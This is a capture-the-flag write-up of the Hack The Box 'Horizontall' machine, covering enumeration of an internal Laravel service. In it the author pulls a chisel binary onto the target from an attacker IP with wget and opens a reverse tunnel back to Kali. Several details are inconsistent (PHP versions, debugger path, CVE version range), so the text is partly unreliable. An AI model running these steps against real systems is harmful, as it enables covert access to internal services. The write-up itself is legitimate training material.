Laravel
i initially found out that the 127.0.0.1:8000 socket was up and listening, and PEAS later also picked up on that as well
Since I cannot see processes running by other users due to lack of privileges, I couldn’t even tell what it was occupying that socket. So I just decided to connect to it via Netcat and see what it does
strapi@horizontall:/var/lib$ nc 127.0.0.1 8000 -v
Connection to 127.0.0.1 8000 port [tcp/*] succeeded!
help
idIt wasn’t responsive at all and the connection was cutoff shortly after. Not very helpful
strapi@horizontall:/var/lib$ curl -s http://127.0.0.1:8000/ -I
HTTP/1.1 200 OK
host: 127.0.0.1:8000
date: Thu, 13 Apr 2023 17:54:50 GMT
connection: close
x-powered-by: PHP/7.4.22
content-type: text/html; charset=UTF-8
cache-control: no-cache, private
date: Thu, 13 Apr 2023 17:54:50 GMT
set-cookie: XSRF-TOKEN=eyJpdiI6ImRuODZvcEl6TDJRTXMrU3R3aHl0VUE9PSIsInZhbHVlIjoiaVZGWGlRSHYyNldoN25KK0lRWWY4Q1JrQ3haY1FQOXdUTGgyRGgvR29NVmRyQU01dnNCYWpiVlRZcGZvRDRkeEpwemJSN2tXSDh3ZDlrZzM1aFNWdXRWZDNtV3NpSFJHbWR0UEM4NzBoVlJLV2Q3cEJQRmpmdW96SGZPdGFvWE4iLCJtYWMiOiIxZGI4M2RkM2NkYTgxNzlmYjY3ZGE5YmEyNDkwYWExY2QwNGZjYWFmYmQ5MDdjMWRkOWVlNmIwMzQ0NjIxNGMxIn0%3D; expires=Thu, 13-Apr-2023 19:54:50 GMT; Max-Age=7200; Set-Cookie: XSRF-TOKEN=eyJpdiI6ImRuODZvcEl6TDJRTXMrU3R3aHl0VUE9PSIsInZhbHVlIjoiaVZGWGlRSHYyNldoN25KK0lRWWY4Q1JrQ3haY1FQOXdUTGgyRGgvR29NVmRyQU01dnNCYWpiVlRZcGZvRDRkeEpwemJSN2tXSDh3ZDlrZzM1aFNWdXRWZDNtV3NpSFJHbWR0UEM4NzBoVlJLV2Q3cEJQRmpmdW96SGZPdGFvWE4iLCJtYWMiOiIxZGI4M2RkM2NkYTgxNzlmYjY3ZGE5YmEyNDkwYWExY2QwNGZjYWFmYmQ5MDdjMWRkOWVlNmIwMzQ0NjIxNGMxIn0%3D; expires=Thu, 13-Apr-2023 19:54:50 GMT; Max-Age=7200; path=/; samesite=lax
set-cookie: laravel_session=eyJpdiI6InRzczJyTUJNUzZzRS9SajFHMnl1Zmc9PSIsInZhbHVlIjoiU2ZpRVovRkNldHFIWEs2VHdKRWNqVXRIOWw0RUxybEJSK25iQjFJS2tRME8wY1orNmtwdFl5QUJxOHByalkzS1hMTnFHY3J2WGgyRmIyZzRZU3NGOEdGSUViTlQrbnVCMTVxNlZDM2ppOWNQeTBJaHZWTkNDNFI2Nk5mb09xQ08iLCJtYWMiOiI1YTA2ZWE5ZmM5M2JmNmEwMzc3OGI5Y2MyNTdmMjZhYjA2YWI3OTZhY2IyZWEyYjIyZThlNzUyMGQyNjM4MzdjIn0%3D; expires=Thu, 13-Apr-2023 19:54:50 GMT; Max-Age=7200; path=/; httponly; samesite=laxHowever, connecting to it via curl returned some information regarding the service based on the returned http header, a laravel instance seems to be running on the socket
laravel is a free and open-source PHP web framework, intended for the development of web applications following the model–view–controller (MVC) architectural pattern and based on Symfony
Since it doesn’t seem to be proxied through any public facing web server, I would need to tunnel it to access it
Tunneling with Chisel
I will be using chisel for tunneling
strapi@horizontall:/dev/shm$ wget -q http://10.10.14.7/chiselx64 ; chmod 755 ./chiselx64Delivery complete
┌──(kali㉿kali)-[~/archive/htb/labs/horizontall]
└─$ chisel server -p 55555 --reverse
2023/04/13 20:47:26 server: Reverse tunnelling enabled
2023/04/13 20:47:26 server: Fingerprint lWoPqga+rRY3fh7sryZdbfGhQPn9xIABjq6vlcpZpTM=
2023/04/13 20:47:26 server: Listening on http://0.0.0.0:55555Starting a reverse chisel server on the Kali port 55555
strapi@horizontall:/dev/shm$ ./chiselx64 client 10.10.14.7:55555 R:800:127.0.0.1:8000
2023/04/13 18:49:52 client: Connecting to ws://10.10.14.7:55555
2023/04/13 18:49:53 client: Connected (Latency 94.068606ms)From the target system, I tunneled the Kali port 800 to the target system’s socket; 127.0.0.1:8000
The connection has been established. I should now be able to access the Laravel instance through the Kali’s port 800
Laravel
Webroot
The footer shows that it’s the version 8, using PHP 7.4.18
Wappalyzer identified technologies involved.
it seems that the web server is just the python’s simplehttp module.
It uses SimpleHTTP 0.6, powered by Python 3.10.9
The application itself seems to be written in PHP 7.4.22
when encountering an instance of laravel, it’s always a good practice to check for the debugging tool available at /profiles
Debugging
Heading over to /profiles indeed reveals the debugger
The current context seems to be mapped to the /home/developer/myproject/ directory
strapi@horizontall:/home/developer$ ls -l
total 68
-rw-rw---- 1 developer developer 58460 May 26 2021 composer-setup.php
drwx------ 12 developer developer 4096 May 26 2021 myproject
-r--r--r-- 1 developer developer 33 Apr 13 13:09 user.txtand it’s right there at the home directory of the developer user. It’s not accessible as the current user
The Context menu shows the exact version of the Laravel instance; 8.43.0
Vulnerability
top results from google search for Laravel 8.43.0 exploit reveals a vulnerability; [[Horizontall_Privilege_Escalation#CVE-2021-3129|CVE-2021-3129]]
[[horizontall_privilege_escalation#cve-2021-3129|CVE-2021-3129]] seems to be present in the Laravel before the version 8.4.2 whereas the target instance is running the version 8.43.0
while it seems that the exploit won’t work due to the version difference, i will still [[horizontall_privilege_escalation#cve-2021-3129|give it a shot]] since the exploit is targeting an internal package that shows the error page, NOT the Laravel itself